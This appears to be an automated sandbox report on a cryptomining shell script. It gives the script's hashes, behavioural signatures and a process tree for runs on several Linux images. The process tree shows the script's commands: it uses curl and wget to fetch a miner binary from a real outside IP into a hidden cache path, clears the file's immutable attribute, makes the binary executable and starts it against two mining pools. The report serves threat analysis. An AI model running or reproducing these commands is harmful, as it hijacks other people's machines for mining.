Analysis
-
max time kernel
139s -
max time network
144s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
27/03/2025, 15:57
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 921 chmod 975 chmod 1090 chmod 769 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /.cache/.kswapd 922 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh /.cache/.kswapd 1091 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Attempts to change immutable files 37 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 874 grep 1015 grep 1075 grep 818 grep 895 grep 1027 grep 1051 grep 1067 grep 1071 grep 826 grep 830 grep 838 grep 846 grep 974 chattr 1039 grep 1055 grep 768 chattr 822 grep 878 grep 854 grep 858 grep 866 grep 1035 grep 1043 grep 1059 grep 814 grep 834 grep 842 grep 1031 grep 870 grep 1019 grep 1023 grep 1047 grep 1063 grep 810 grep 850 grep 862 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 IoCs
description ioc Process File opened for modification /usr/local/bin/.clB1sa5None 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Reads CPU attributes 1 TTPs 6 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Process Discovery 1 TTPs 6 IoCs
Adversaries may try to discover information about running processes.
pid Process 747 ps 757 ps 771 ps 790 ps 977 ps 995 ps -
description ioc Process File opened for reading /proc/695/stat ps File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/13/stat ps File opened for reading /proc/13/cmdline ps File opened for reading /proc/6/stat ps File opened for reading /proc/5/cmdline ps File opened for reading /proc/69/cmdline ps File opened for reading /proc/15/status ps File opened for reading /proc/328/stat ps File opened for reading /proc/2/stat ps File opened for reading /proc/71/stat ps File opened for reading /proc/239/cmdline ps File opened for reading /proc/789/cmdline ps File opened for reading /proc/2/status ps File opened for reading /proc/105/stat ps File opened for reading /proc/789/stat ps File opened for reading /proc/19/stat ps File opened for reading /proc/991/cmdline ps File opened for reading /proc/82/stat ps File opened for reading /proc/meminfo ps File opened for reading /proc/37/status ps File opened for reading /proc/992/stat ps File opened for reading /proc/1008/stat ps File opened for reading /proc/486/cmdline ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/10/stat ps File opened for reading /proc/115/status ps File opened for reading /proc/76/stat ps File opened for reading /proc/105/stat ps File opened for reading /proc/491/cmdline ps File opened for reading /proc/36/stat ps File opened for reading /proc/73/status ps File opened for reading /proc/36/status ps File opened for reading /proc/77/status ps File opened for reading /proc/20/cmdline ps File opened for reading /proc/1000/stat ps File opened for reading /proc/3/status ps File opened for reading /proc/486/status ps File opened for reading /proc/758/stat ps File opened for reading /proc/72/stat ps File opened for reading /proc/22/cmdline ps File opened for reading /proc/105/cmdline ps File opened for reading /proc/330/status ps File opened for reading /proc/764/cmdline ps File opened for reading /proc/74/status ps File opened for reading /proc/17/cmdline ps File opened for reading /proc/778/cmdline ps File opened for reading /proc/14/status ps File opened for reading /proc/689/stat ps File opened for reading /proc/1/status ps File opened for reading /proc/486/stat ps File opened for reading /proc/9/stat ps File opened for reading /proc/491/status ps File opened for reading /proc/776/status ps File opened for reading /proc/14/stat ps File opened for reading /proc/993/stat ps File opened for reading /proc/self/stat ps File opened for reading /proc/386/status ps File opened for reading /proc/37/status ps File opened for reading /proc/797/status ps File opened for reading /proc/10/status ps File opened for reading /proc/19/cmdline ps File opened for reading /proc/376/stat ps File opened for reading /proc/674/stat ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/.clB1sa5None 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.clB1sa5None 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Executes dropped EXE
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:697 -
/bin/unameuname -a2⤵PID:705
-
-
/bin/rmrm --help2⤵PID:709
-
-
/bin/grepgrep " rm does not remove dir"2⤵PID:710
-
-
/usr/bin/wcwc -l2⤵PID:711
-
-
/usr/bin/wcwc -l2⤵PID:717
-
-
/usr/bin/curlcurl --help2⤵PID:715
-
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵PID:716
-
-
/bin/grepgrep -i "wgetrc "2⤵PID:726
-
-
/usr/bin/wcwc -l2⤵PID:727
-
-
/usr/bin/wgetwget --version2⤵PID:725
-
-
/usr/bin/trtr -dc A-Za-z0-92⤵PID:732
-
-
/usr/bin/headhead /dev/urandom2⤵PID:731
-
-
/usr/bin/shufshuf -i 4-16 -n 12⤵PID:735
-
-
/usr/bin/headhead -c 112⤵PID:733
-
-
/bin/rmrm -f /tmp/.clB1sa5None2⤵PID:740
-
-
/bin/rmrm -f /tmp/.clB1sa5None2⤵PID:741
-
-
/bin/rmrm -f /usr/local/bin/.clB1sa5None2⤵PID:743
-
-
/bin/rmrm -f /dev/shm/.clB1sa5None2⤵PID:744
-
-
/bin/rmrm -f /.clB1sa5None2⤵PID:745
-
-
/bin/grepgrep -v grep2⤵PID:748
-
-
/bin/grepgrep -v defunct2⤵PID:749
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:747
-
-
/bin/grepgrep -v "sh "2⤵PID:750
-
-
/bin/grepgrep " sleep 120"2⤵PID:751
-
-
/usr/bin/wcwc -l2⤵PID:752
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:757
-
-
/bin/grepgrep -v "sh "2⤵PID:759
-
-
/bin/grepgrep -v grep2⤵PID:758
-
-
/bin/grepgrep -v defunct2⤵PID:760
-
-
/bin/grepgrep " sleep 120"2⤵PID:761
-
-
/usr/bin/wcwc -l2⤵PID:762
-
-
/bin/sleepsleep 1202⤵PID:766
-
-
/bin/mkdirmkdir -p /.cache/2⤵PID:767
-
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
PID:768
-
-
/bin/chmodchmod 1755 /.cache/2⤵
- File and Directory Permissions Modification
PID:769
-
-
/bin/grepgrep -v l02⤵PID:772
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:771
-
-
/bin/grepgrep -v eth12⤵PID:773
-
-
/bin/grepgrep -v lan02⤵PID:774
-
-
/bin/grepgrep -v "^-"2⤵PID:775
-
-
/bin/grepgrep -v eth02⤵PID:776
-
-
/bin/grepgrep -v inet02⤵PID:777
-
-
/bin/grepgrep -v lano2⤵PID:778
-
-
/bin/grepgrep -v grep2⤵PID:779
-
-
/bin/grepgrep -v defunct2⤵PID:780
-
-
/bin/grepgrep -v knthread2⤵PID:781
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:782
-
-
/bin/grepgrep -vi "java "2⤵PID:783
-
-
/bin/grepgrep -vi jenkins2⤵PID:784
-
-
/bin/grepgrep -vi exim2⤵PID:785
-
-
/usr/bin/headhead -n 12⤵PID:787
-
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵PID:786
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:790
-
-
/bin/grepgrep -v l02⤵PID:791
-
-
/bin/grepgrep -v eth12⤵PID:792
-
-
/bin/grepgrep -v lan02⤵PID:793
-
-
/bin/grepgrep -v "^-"2⤵PID:794
-
-
/bin/grepgrep -v eth02⤵PID:795
-
-
/bin/grepgrep -v inet02⤵PID:796
-
-
/bin/grepgrep -v lano2⤵PID:797
-
-
/bin/grepgrep -v grep2⤵PID:798
-
-
/bin/grepgrep -v defunct2⤵PID:799
-
-
/bin/grepgrep -v python2⤵PID:800
-
-
/bin/grepgrep -v knthread2⤵PID:801
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:802
-
-
/bin/grepgrep -vi bash2⤵PID:803
-
-
/bin/grepgrep -vi exim2⤵PID:804
-
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵PID:805
-
-
/usr/bin/uniquniq2⤵PID:806
-
-
/bin/readlinkreadlink /proc/323/exe2⤵PID:808
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe2⤵
- Attempts to change immutable files
PID:810
-
-
/bin/readlinkreadlink /proc/326/exe2⤵PID:812
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe2⤵
- Attempts to change immutable files
PID:814
-
-
/bin/readlinkreadlink /proc/328/exe2⤵PID:816
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe2⤵
- Attempts to change immutable files
PID:818
-
-
/bin/readlinkreadlink /proc/330/exe2⤵PID:820
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe2⤵
- Attempts to change immutable files
PID:822
-
-
/bin/readlinkreadlink /proc/334/exe2⤵PID:824
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/334/exe2⤵
- Attempts to change immutable files
PID:826
-
-
/bin/readlinkreadlink /proc/374/exe2⤵PID:828
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe2⤵
- Attempts to change immutable files
PID:830
-
-
/bin/readlinkreadlink /proc/376/exe2⤵PID:832
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/376/exe2⤵
- Attempts to change immutable files
PID:834
-
-
/bin/readlinkreadlink /proc/386/exe2⤵PID:836
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/386/exe2⤵
- Attempts to change immutable files
PID:838
-
-
/bin/readlinkreadlink /proc/390/exe2⤵PID:840
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/390/exe2⤵
- Attempts to change immutable files
PID:842
-
-
/bin/readlinkreadlink /proc/486/exe2⤵PID:844
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/486/exe2⤵
- Attempts to change immutable files
PID:846
-
-
/bin/readlinkreadlink /proc/491/exe2⤵PID:848
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/491/exe2⤵
- Attempts to change immutable files
PID:850
-
-
/bin/readlinkreadlink /proc/688/exe2⤵PID:852
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/688/exe2⤵
- Attempts to change immutable files
PID:854
-
-
/bin/readlinkreadlink /proc/689/exe2⤵PID:856
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/689/exe2⤵
- Attempts to change immutable files
PID:858
-
-
/bin/readlinkreadlink /proc/693/cwd2⤵PID:859
-
-
/bin/catcat /proc/693/comm2⤵PID:860
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
PID:862
-
-
/bin/readlinkreadlink /proc/694/cwd2⤵PID:863
-
-
/bin/catcat /proc/694/comm2⤵PID:864
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
PID:866
-
-
/bin/readlinkreadlink /proc/695/cwd2⤵PID:867
-
-
/bin/catcat /proc/695/comm2⤵PID:868
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
PID:870
-
-
/bin/readlinkreadlink /proc/699/exe2⤵PID:872
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe2⤵
- Attempts to change immutable files
PID:874
-
-
/bin/readlinkreadlink /proc/700/exe2⤵PID:876
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/700/exe2⤵
- Attempts to change immutable files
PID:878
-
-
/bin/readlinkreadlink /proc/766/exe2⤵PID:893
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/766/exe2⤵
- Attempts to change immutable files
PID:895
-
-
/bin/grepgrep x86_642⤵PID:902
-
-
/usr/bin/wcwc -l2⤵PID:903
-
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵PID:905
-
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵PID:910
-
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
- File and Directory Permissions Modification
PID:921
-
-
/bin/sleepsleep 1202⤵PID:972
-
-
/bin/mkdirmkdir -p /.cache/2⤵PID:973
-
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
PID:974
-
-
/bin/chmodchmod 1755 /.cache/2⤵
- File and Directory Permissions Modification
PID:975
-
-
/bin/grepgrep -v eth12⤵PID:979
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:977
-
-
/bin/grepgrep -v l02⤵PID:978
-
-
/bin/grepgrep -v "^-"2⤵PID:981
-
-
/bin/grepgrep -v lan02⤵PID:980
-
-
/bin/grepgrep -v eth02⤵PID:982
-
-
/bin/grepgrep -v inet02⤵PID:983
-
-
/bin/grepgrep -v lano2⤵PID:984
-
-
/bin/grepgrep -v grep2⤵PID:985
-
-
/bin/grepgrep -v defunct2⤵PID:986
-
-
/bin/grepgrep -v knthread2⤵PID:987
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:988
-
-
/bin/grepgrep -vi "java "2⤵PID:989
-
-
/bin/grepgrep -vi jenkins2⤵PID:990
-
-
/bin/grepgrep -vi exim2⤵PID:991
-
-
/usr/bin/headhead -n 12⤵PID:993
-
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵PID:992
-
-
/bin/grepgrep -v eth12⤵PID:997
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:995
-
-
/bin/grepgrep -v l02⤵PID:996
-
-
/bin/grepgrep -v lan02⤵PID:998
-
-
/bin/grepgrep -v "^-"2⤵PID:999
-
-
/bin/grepgrep -v eth02⤵PID:1000
-
-
/bin/grepgrep -v inet02⤵PID:1001
-
-
/bin/grepgrep -v lano2⤵PID:1002
-
-
/bin/grepgrep -v grep2⤵PID:1003
-
-
/bin/grepgrep -v defunct2⤵PID:1004
-
-
/bin/grepgrep -v python2⤵PID:1005
-
-
/bin/grepgrep -v knthread2⤵PID:1006
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:1007
-
-
/bin/grepgrep -vi bash2⤵PID:1008
-
-
/bin/grepgrep -vi exim2⤵PID:1009
-
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵PID:1010
-
-
/usr/bin/uniquniq2⤵PID:1011
-
-
/bin/readlinkreadlink /proc/323/exe2⤵PID:1013
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe2⤵
- Attempts to change immutable files
PID:1015
-
-
/bin/readlinkreadlink /proc/326/exe2⤵PID:1017
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe2⤵
- Attempts to change immutable files
PID:1019
-
-
/bin/readlinkreadlink /proc/328/exe2⤵PID:1021
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe2⤵
- Attempts to change immutable files
PID:1023
-
-
/bin/readlinkreadlink /proc/330/exe2⤵PID:1025
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe2⤵
- Attempts to change immutable files
PID:1027
-
-
/bin/readlinkreadlink /proc/334/exe2⤵PID:1029
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/334/exe2⤵
- Attempts to change immutable files
PID:1031
-
-
/bin/readlinkreadlink /proc/374/exe2⤵PID:1033
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe2⤵
- Attempts to change immutable files
PID:1035
-
-
/bin/readlinkreadlink /proc/376/exe2⤵PID:1037
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/376/exe2⤵
- Attempts to change immutable files
PID:1039
-
-
/bin/readlinkreadlink /proc/386/exe2⤵PID:1041
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/386/exe2⤵
- Attempts to change immutable files
PID:1043
-
-
/bin/readlinkreadlink /proc/390/exe2⤵PID:1045
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/390/exe2⤵
- Attempts to change immutable files
PID:1047
-
-
/bin/readlinkreadlink /proc/486/exe2⤵PID:1049
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/486/exe2⤵
- Attempts to change immutable files
PID:1051
-
-
/bin/readlinkreadlink /proc/491/exe2⤵PID:1053
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/491/exe2⤵
- Attempts to change immutable files
PID:1055
-
-
/bin/readlinkreadlink /proc/693/cwd2⤵PID:1056
-
-
/bin/catcat /proc/693/comm2⤵PID:1057
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
PID:1059
-
-
/bin/readlinkreadlink /proc/694/cwd2⤵PID:1060
-
-
/bin/catcat /proc/694/comm2⤵PID:1061
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
PID:1063
-
-
/bin/readlinkreadlink /proc/695/cwd2⤵PID:1064
-
-
/bin/catcat /proc/695/comm2⤵PID:1065
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
PID:1067
-
-
/bin/readlinkreadlink /proc/700/exe2⤵PID:1069
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/700/exe2⤵
- Attempts to change immutable files
PID:1071
-
-
/bin/readlinkreadlink /proc/972/exe2⤵PID:1073
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/972/exe2⤵
- Attempts to change immutable files
PID:1075
-
-
/usr/bin/cutcut -c 1-322⤵PID:1079
-
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵PID:1078
-
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵PID:1081
-
-
/usr/bin/cutcut -c 1-322⤵PID:1082
-
-
/bin/grepgrep x86_642⤵PID:1085
-
-
/usr/bin/wcwc -l2⤵PID:1086
-
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵PID:1088
-
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵PID:1089
-
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
- File and Directory Permissions Modification
PID:1090
-
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵PID:922
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵PID:1091
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12B
MD525746727d2b688a4595b743a7098c13c
SHA100e95881126ae85bbc0e2565a4b23f52b3436de2
SHA256b39d5862ae56e24a9831d3a31de1839276368d1b3921c965ba66beacfa20f2ba
SHA5124c3d89b888bb2561a2332c84cc913bfd0f3aa67f9b0e8ff58bb8bba912b3571257c56484059b0be077f6454c4bd348f8eef2f719db2c613cfdba898a4ba58be7